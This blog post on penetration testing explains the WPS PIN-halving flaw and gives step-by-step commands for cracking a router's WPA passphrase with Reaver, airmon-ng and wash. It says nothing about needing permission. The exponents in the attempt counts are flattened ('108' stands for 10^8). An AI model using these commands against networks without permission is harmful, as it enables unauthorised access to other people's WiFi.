Using Reaver to brute force WiFi Protected Setup (WPS)

by DFIRninja
Categories: Penetration Testing
Tags: , , ,
Comments: Leave a Comment

Everything created nowadays have flaws, routers being one of them. Once vulnerabilities are surfaced, people are only steps behind to create tools to exploit those vulnerabilities. Reaver is an open-source tool created by “Tactical Network Solutions” capable of exploiting the WiFi Protected Setup (WPS) vulnerability discovered by security researcher Stefan Viehböck.

What is WPS?
Wi-Fi Protected Setup is an optional certification program from the Wi-Fi Alliance that is designed to ease the task of setting up and configuring security on wireless local area networks. It enables typical users who possess little understanding of traditional Wi-Fi configuration and security settings to automatically configure new wireless networks, add new devices and enable security. Instead of going through the hassle to set up the encryption for your router, simply push the button on the router and enter the PIN in a network setup wizard. Of course with the ease come design flaws. Reaver implements a brute force attack against WPS registrar PINs in order to recover WPA/WPA2 passphrases. The vulnerability that reaver exploits is CVE-2011-5053.

Design Flaw:

  1. An attacker can derive information about the correctness of parts of the PIN from the Access Point’s responses:
  2. If the attacker receives an EAP-NACK message after sending M4, he knows that the 1st half of the PIN was incorrect.

If the attacker receives an EAP-NACK message after sending M6, he knows that the 2nd half of the PIN was incorrect. 
This form of authentication dramatically decreases the maximum possible authentication attempts needed from 108 (100,000,000) to 104 + 104 (20,000). Since the last digit of the PIN is the checksum, it drops the attempts down even further to 104  + 103 (11,000).

Hands on:

The only things you need to test this is a platform with reaver installed, along with a wireless card that can be put into monitor mode. Reaver comes built-in with the latest version of Backtrack 5 R3 but can also be installed by opening a terminal and typing the command:

# apt-get install reaver


1. Configure your wireless card into monitor mode:
# airmon-ng start wlan0

airmon-ng start wlan0


2. Enumerate BSSID of target APs:
# wash –i mon0 (shown in screenshot below)
# airodump-ng mon0

wash -i mon0


3. Run Reaver with the following command:
# reaver –i mon0 –c [channel] –b [BSSID] –vv
Example:  # reaver –i mon0 –c 6 -b 00:15:FF:19:29:4D –vv 

start reaver

reaver finished


Reaver cracked this PIN and found the passphrase in only 3 seconds:

reaver 3 second finish


What the cracking looks like:
Identity request – Hey, who are you?
Identity response – I am device derp.
M1 – What do you want?
M2 – I want to connect via WPS.
M3 – What are the first 4 digits of your pin?
M4 – They are XXXX.
M5 – Correct, what are the last 4 digits of your pin?
M6 – They are XXXX.
M7 – Correct, the PSK is xyzxyzxyz.



Leave a Reply

Your email address will not be published. Required fields are marked *

Today is Monday